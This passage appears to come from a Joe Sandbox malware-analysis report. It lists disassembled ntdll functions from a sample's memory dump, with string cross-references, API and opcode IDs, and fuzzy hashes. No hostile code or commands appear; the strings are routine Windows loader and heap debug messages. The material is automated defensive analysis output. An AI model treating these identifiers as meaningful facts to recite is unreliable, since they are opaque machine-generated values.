                                                    • Instruction Fuzzy Hash: 35929F71618352AFE721EF28CC80B6BB7E8BB88758F04491DFA95D7251D770E844CB92
                                                    Function 012D8620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • Critical section address., xrefs: 01315502
                                                    • Thread identifier, xrefs: 0131553A
                                                    • Critical section debug info address, xrefs: 0131541F, 0131552E
                                                    • Critical section address, xrefs: 01315425, 013154BC, 01315534
                                                    • 8, xrefs: 013152E3
                                                    • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 0131540A, 01315496, 01315519
                                                    • corrupted critical section, xrefs: 013154C2
                                                    • Address of the debug info found in the active list., xrefs: 013154AE, 013154FA
                                                    • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013154E2
                                                    • Thread is in a state in which it cannot own a critical section, xrefs: 01315543
                                                    • undeleted critical section in freed memory, xrefs: 0131542B
                                                    • double initialized or corrupted critical section, xrefs: 01315508
                                                    • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 013154CE
                                                    • Invalid debug info address of this critical section, xrefs: 013154B6
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                    • API String ID: 0-2368682639
                                                    • Opcode ID: abec0c021d4d4f995282eec9352df840bc5930b8fe21701f9b8a967ab17feefa
                                                    • Instruction ID: 56cb84cb9e72c09f89ef05a98c2cdd8178365a2c3f3af90966f42d9c79f431ad
                                                    • Opcode Fuzzy Hash: abec0c021d4d4f995282eec9352df840bc5930b8fe21701f9b8a967ab17feefa
                                                    • Instruction Fuzzy Hash: EB81CCB1A41348EFDB24CF99C845FAEBBB9FB49718F504119F605B7680D3B1A940CBA0
                                                    Function 012D29F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 01312498
                                                    • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 01312412
                                                    • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 01312602
                                                    • RtlpResolveAssemblyStorageMapEntry, xrefs: 0131261F
                                                    • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 01312506
                                                    • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 013124C0
                                                    • @, xrefs: 0131259B
                                                    • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 013125EB
                                                    • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 01312624
                                                    • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 013122E4
                                                    • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 01312409
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$RtlpResolveAssemblyStorageMapEntry$SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx$SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p$SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx$SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx$SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx$SXS: Attempt to translate DOS path name "%S" to NT format failed$SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx$SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx$SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries
                                                    • API String ID: 0-4009184096
                                                    • Opcode ID: ff18643b5553fecfe27772586a3cf270e14250e03387098073ed402eacd37f54
                                                    • Instruction ID: a31fdb944eb192c0397c183f4025b83c5e391ecc612e30d5f64c7b95bf586b44
                                                    • Opcode Fuzzy Hash: ff18643b5553fecfe27772586a3cf270e14250e03387098073ed402eacd37f54
                                                    • Instruction Fuzzy Hash: 6A027EB1D10229DFDB21DB54CC81BEAB7B8AB54704F1141DAE609B7241EB70AE84CF69
                                                    Function 01348B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                    • API String ID: 0-2515994595
                                                    • Opcode ID: 7fffafb27f841e3db6559e29a6570eb0f86620e4e41b1463209eceacb17256d2
                                                    • Instruction ID: 42a94de4622d93144c84b31c4797494760862b3c3fe5574d6a56529a0a4339b8
                                                    • Opcode Fuzzy Hash: 7fffafb27f841e3db6559e29a6570eb0f86620e4e41b1463209eceacb17256d2
                                                    • Instruction Fuzzy Hash: AE51D0715253059BC729DF58C848BABBBECFF94748F14496DE999C3240E770EA04CB92
                                                    Function 01350274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                    • API String ID: 0-1700792311
                                                    • Opcode ID: 3b33c515fbf47c20c33ce977e4c9c0b5fcbb0dd2fceb10aa7fc428beb21d95ee
                                                    • Instruction ID: 1641aa78ba6f4f22fafd13e0b59733f7d6837cfd04bbe3e65593f6c05be9e137
                                                    • Opcode Fuzzy Hash: 3b33c515fbf47c20c33ce977e4c9c0b5fcbb0dd2fceb10aa7fc428beb21d95ee
                                                    • Instruction Fuzzy Hash: DFD1DC31620686DFDB6ADF6CC440EAEBBF1FF49B18F088459F8459B652C7369981CB10
                                                    Function 012D63FF Relevance: 10.3, Strings: 8, Instructions: 261COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 82$Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$`-$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-505181549
                                                    • Opcode ID: 00ced2879d8cd04c5bb26b382b0e1f3019d6dbd7d6577670e004583cd7c853f7
                                                    • Instruction ID: d5344c64661afbd41502b632f7777ffaf642e38cc213cfa3d38812a639d369cd
                                                    • Opcode Fuzzy Hash: 00ced2879d8cd04c5bb26b382b0e1f3019d6dbd7d6577670e004583cd7c853f7
                                                    • Instruction Fuzzy Hash: 64917B70B21316DBEB39DF58D845BAE7BA5FF41B28F100129E6006B389D7B59882C7D0
                                                    Function 013289B3 Relevance: 10.3, Strings: 8, Instructions: 259COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • HandleTraces, xrefs: 01328C8F
                                                    • VerifierDlls, xrefs: 01328CBD
                                                    • AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 01328A3D
                                                    • `-, xrefs: 01328A35, 01328A5F
                                                    • AVRF: -*- final list of providers -*- , xrefs: 01328B8F
                                                    • VerifierDebug, xrefs: 01328CA5
                                                    • AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 01328A67
                                                    • VerifierFlags, xrefs: 01328C50
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags$`-
                                                    • API String ID: 0-4155651317
                                                    • Opcode ID: 69a15291f5e4dcecf32b95b4a06c6a0e59547298a730888f366038b673d4e36b
                                                    • Instruction ID: 26c2d42214a438e8c62ec7ab5a0ca270c2116bb615e8399d746641a3fcb25534
                                                    • Opcode Fuzzy Hash: 69a15291f5e4dcecf32b95b4a06c6a0e59547298a730888f366038b673d4e36b
                                                    • Instruction Fuzzy Hash: 9C912671645336AFEB22FF2CC881B6A77E8AB54B1CF05099DFA406B651C7309C44C795
                                                    Function 0129645D Relevance: 8.9, Strings: 7, Instructions: 150COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$`-$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-660500444
                                                    • Opcode ID: 5dbbb04a848834b2562aeee552608aacd24ba2ef2bc3849e7b87ab9dfa8e020b
                                                    • Instruction ID: d78b4e17bc834a570d62828d886be207626b84db886dcce70be0cb654bbebc15
                                                    • Opcode Fuzzy Hash: 5dbbb04a848834b2562aeee552608aacd24ba2ef2bc3849e7b87ab9dfa8e020b
                                                    • Instruction Fuzzy Hash: CA51C6712683059FEB25EF28D881BABB7E8FF84748F00092DF68597150D671E944CB92
                                                    Function 012AEA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
                                                    • API String ID: 0-1109411897
                                                    • Opcode ID: 99a37bafe0373bb80140b6f401ab71b03969b55033079d4367942daa421bbda3
                                                    • Instruction ID: d787040445f2944fb0711d12fcf2020ef54023c8fdcd07ff8e6d7404c8cd6922
                                                    • Opcode Fuzzy Hash: 99a37bafe0373bb80140b6f401ab71b03969b55033079d4367942daa421bbda3
                                                    • Instruction Fuzzy Hash: A4A27870A2562A8FDB65DF18CD987ADBBB5BF45304F5042E9DA0DA7290DB349E81CF00
                                                    Function 012D2674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 01312178
                                                    • SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 0131219F
                                                    • SXS: %s() passed the empty activation context, xrefs: 01312165
                                                    • SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 01312180
                                                    • RtlGetAssemblyStorageRoot, xrefs: 01312160, 0131219A, 013121BA
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 013121BF
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
                                                    • API String ID: 0-861424205
                                                    • Opcode ID: c72f2aaae569f16fe42b8cfc1f8f046268d621af451958f044caa30e0c91b9d0
                                                    • Instruction ID: 1b8806f52b091ec4da73b0b07f618455b99ed96e731efe9bba4d6fe4c7151d66
                                                    • Opcode Fuzzy Hash: c72f2aaae569f16fe42b8cfc1f8f046268d621af451958f044caa30e0c91b9d0
                                                    • Instruction Fuzzy Hash: 84315A3AF61225BBF725DA99CC81F5B7B78DF55A44F254069FB0477144D2709E00C3A0
                                                    Function 012DC6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 012DC6C3
                                                    • LdrpInitializeImportRedirection, xrefs: 01318177, 013181EB
                                                    • Unable to build import redirection Table, Status = 0x%x, xrefs: 013181E5
                                                    • Loading import redirection DLL: '%wZ', xrefs: 01318170
                                                    • minkernel\ntdll\ldrredirect.c, xrefs: 01318181, 013181F5
                                                    • LdrpInitializeProcess, xrefs: 012DC6C4
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
                                                    • API String ID: 0-475462383
                                                    • Opcode ID: 9e8396fd6ac2ef306097f2dffc1be7db3451d482ab4ddebe0ed4e9c30301f9d4
                                                    • Instruction ID: b3002015915c7276aa20fa6e71a70fda00f7b4b9bfa079fabc80f9ba0c35e91f
                                                    • Opcode Fuzzy Hash: 9e8396fd6ac2ef306097f2dffc1be7db3451d482ab4ddebe0ed4e9c30301f9d4
                                                    • Instruction Fuzzy Hash: 3331F3B26643429FD224EF2DD946E2B77D4EF94B24F04066CF945AB295E620EC04C7A2
                                                    Function 012E096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 012E2DF0: LdrInitializeThunk.NTDLL ref: 012E2DFA
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0BA3
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0BB6
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0D60
                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 012E0D74
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                    • String ID:
                                                    • API String ID: 1404860816-0
                                                    • Opcode ID: 8536908324cb209dfd99dc3a218bbdbbecd9b4f4464f49d643a390679861306e
                                                    • Instruction ID: 0b3be7353c1d2d23f00d0f00920e94ead6e55b07de2470078fd077a3a4f8775d
                                                    • Opcode Fuzzy Hash: 8536908324cb209dfd99dc3a218bbdbbecd9b4f4464f49d643a390679861306e
                                                    • Instruction Fuzzy Hash: 77428C71A10705DFDB25CF28C894BAAB7F5FF04304F4445A9E989EB245E7B0AA85CF60
                                                    Function 012AA3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                    • API String ID: 0-379654539
                                                    • Opcode ID: 9f35b91cdd1daccb8b6566aad486e36f3971976d91b8d2613cc8342cc74345e5
                                                    • Instruction ID: 4936d9d0567bb3a08767db2f6d94d88b7b1c8135209151f4778ad483aec49e27
                                                    • Opcode Fuzzy Hash: 9f35b91cdd1daccb8b6566aad486e36f3971976d91b8d2613cc8342cc74345e5
                                                    • Instruction Fuzzy Hash: C0C18C74528382CFDB22CF58C044B6BBBE4FF84708F44496AF9968B291E774C949CB56
                                                    Function 012D8402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 012D8421
                                                    • LdrpInitializeProcess, xrefs: 012D8422
                                                    • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 012D855E
                                                    • @, xrefs: 012D8591
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-1918872054
                                                    • Opcode ID: 76d34b646394c37979714eac0bf4c12403272f1ff941f6f31305a6640193ff24
                                                    • Instruction ID: 5318f25498416480fa870e9263c4ce0b2fbccf1f0c574d412ea8de621ce5a0bf
                                                    • Opcode Fuzzy Hash: 76d34b646394c37979714eac0bf4c12403272f1ff941f6f31305a6640193ff24
                                                    • Instruction Fuzzy Hash: 84917B71568345AFDB22DB65CC81FABBAECFF84744F80092EFA8592151E374D904CB62
                                                    Function 012D273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • SXS: %s() passed the empty activation context, xrefs: 013121DE
                                                    • .Local, xrefs: 012D28D8
                                                    • SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 013122B6
                                                    • RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 013121D9, 013122B1
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
                                                    • API String ID: 0-1239276146
                                                    • Opcode ID: b32ec5bfd78eb37f87e8b93d83a8b4e80af27d7354b3b49b124198d8333132e0
                                                    • Instruction ID: f1e862f7bd3e389204678730e854e95e647801f6dc01eed401a91b040edd214f
                                                    • Opcode Fuzzy Hash: b32ec5bfd78eb37f87e8b93d83a8b4e80af27d7354b3b49b124198d8333132e0
                                                    • Instruction Fuzzy Hash: 62A1D13192122ADFDB25CF68CC84BEAB7B1BF58354F2441E9D908AB255D7309E81CF90
                                                    Function 012A64AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 013010AE
                                                    • ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0130106B
                                                    • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01301028
                                                    • ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01300FE5
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                    • API String ID: 0-1468400865
                                                    • Opcode ID: 5b9c4cef9ff89b235053566131b87238801f68e23507ba0c2018ca4ba5bf2f2f
                                                    • Instruction ID: e92d0fa6dfd4c69629a1eb791529aaefa388554b18a7125de093263d8eafa95b
                                                    • Opcode Fuzzy Hash: 5b9c4cef9ff89b235053566131b87238801f68e23507ba0c2018ca4ba5bf2f2f
                                                    • Instruction Fuzzy Hash: C27102B19143069FCB21EF18C884BAB7FE8AF55754F840469FA898B286D374D588CBD1
                                                    Function 012C245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 0130A9A2
                                                    • apphelp.dll, xrefs: 012C2462
                                                    • LdrpDynamicShimModule, xrefs: 0130A998
                                                    • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0130A992
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-176724104
                                                    • Opcode ID: 144ace345eb8204e13f3609e7d57bb5df70d829ad6d725561a3c8776c2558aea
                                                    • Instruction ID: 3745182426ccf45861fcc4dcd1476a09f45a9bd21eae2e89ad5cb6135fcfe4d9
                                                    • Opcode Fuzzy Hash: 144ace345eb8204e13f3609e7d57bb5df70d829ad6d725561a3c8776c2558aea
                                                    • Instruction Fuzzy Hash: EA312CB5710302EBDB329F6DA995A7ABBFCFB84B08F15011DE9106B295C7715881C780
                                                    Function 013220DE Relevance: 5.0, Strings: 4, Instructions: 41COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • minkernel\ntdll\ldrinit.c, xrefs: 01322104
                                                    • Process initialization failed with status 0x%08lx, xrefs: 013220F3
                                                    • LdrpInitializationFailure, xrefs: 013220FA
                                                    • `-, xrefs: 013220EB
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$`-$minkernel\ntdll\ldrinit.c
                                                    • API String ID: 0-30238589
                                                    • Opcode ID: 9aef3ee6c35a92d3003c24a1f6d812bcc12ddc7081b95921ffc2f36b7c380088
                                                    • Instruction ID: 107f868cbc17dc06d1fa36004e2e401229cfcec1b0b7a1eef13dc3600dd605c2
                                                    • Opcode Fuzzy Hash: 9aef3ee6c35a92d3003c24a1f6d812bcc12ddc7081b95921ffc2f36b7c380088
                                                    • Instruction Fuzzy Hash: 54F0C275651318AFEB24FA4CCC46F9A376CFB40B58F200069FA007B2C5D2B1A940CA91
                                                    Function 012B29A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    • HEAP[%wZ]: , xrefs: 012B3255
                                                    • HEAP: , xrefs: 012B3264
                                                    • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 012B327D
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                    • API String ID: 0-617086771
                                                    • Opcode ID: bf3864ca2de2c5ea748e08fc16e9d1f8131d072a8553c2db84be9c511ac73117
                                                    • Instruction ID: 04205d0d3f76ec2a77f676e6007ee595636e9c3445864e8875a3a8a02e16692a
                                                    • Opcode Fuzzy Hash: bf3864ca2de2c5ea748e08fc16e9d1f8131d072a8553c2db84be9c511ac73117
                                                    • Instruction Fuzzy Hash: EA92AA71A2424ADFEB25CF68C480BEEBBF1FF08340F188059E999AB251D775A945CF50
                                                    Function 012B0770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-4253913091
                                                    • Opcode ID: 3aa34b700e527d88882468f7db4c8206b2727f80ec02f156c2a35155605c8f48
                                                    • Instruction ID: a822c7e39c175282210c41dedf7705995179c79f758e4c2aca5d083b51933322
                                                    • Opcode Fuzzy Hash: 3aa34b700e527d88882468f7db4c8206b2727f80ec02f156c2a35155605c8f48
                                                    • Instruction Fuzzy Hash: D2F1CE70610606DFEB2ACF68C894BAAB7F9FF44744F148168E5169B381D770E981CF94
                                                    Function 012C6962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1431995842.0000000001270000.00000040.00001000.00020000.00000000.sdmp, Offset: 01270000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_1270000_8hd98EhtIFcYkb8.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: $@
                                                    • API String ID: 0-1077428164
                                                    • Opcode ID: 5a084feb9f6ff76178c43239073b4178b0dae6a5862731a9d4af22eda6dae651
                                                    • Instruction ID: 6799e801360dca7dba21b6f0877cddb1d679f487855aaffe1bb60b16ee0cfb3e
                                                    • Opcode Fuzzy Hash: 5a084feb9f6ff76178c43239073b4178b0dae6a5862731a9d4af22eda6dae651
